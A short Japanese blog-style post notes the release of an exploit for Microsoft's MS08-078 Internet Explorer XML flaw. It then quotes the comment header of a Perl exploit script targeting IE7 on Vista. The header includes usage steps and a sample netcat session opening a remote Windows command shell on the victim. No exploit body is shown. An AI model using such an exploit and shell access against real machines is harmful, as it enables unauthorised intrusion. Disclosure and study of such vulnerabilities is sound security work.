MS08-078に関するExploitが出ています。LocalExploitみたいですね。

#!/usr/bin/perl 
# msie_xmlbof_vista.pl 
# Microsoft Internet Explorer XML Buffer Overflow Exploit 
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] 
# 
# I wanted a reliable shell, so I figured I'd whip up something nice for IE7+Vista 
# Only the first hundred calculators popping up on the screen is hilarious 
# Core/Concepts from other available exploits... Yeah, thanks skylined/krafy/muts 
# 
# bash$ perl msie_xmlbof_vista.pl 
# Usage: msie_xmlbof_vista.pl <filename.html> 
# bash$ perl msie_xmlbof_vista.pl /var/www/msie_xmlbof_vista.html 
# 
# *** Launching IE7 on Vista SP1 with URL: http://192.168.100.105/msie_xmlbof_vista.html *** 
# 
# bash$ nc 192.168.100.118 30702 
# Microsoft Windows [Version 6.0.6001] 
# Copyright (c) 2006 Microsoft Corporation. All rights reserved. 
# 
# C:\Users\vista\Desktop> 
# 
# Enjoy :)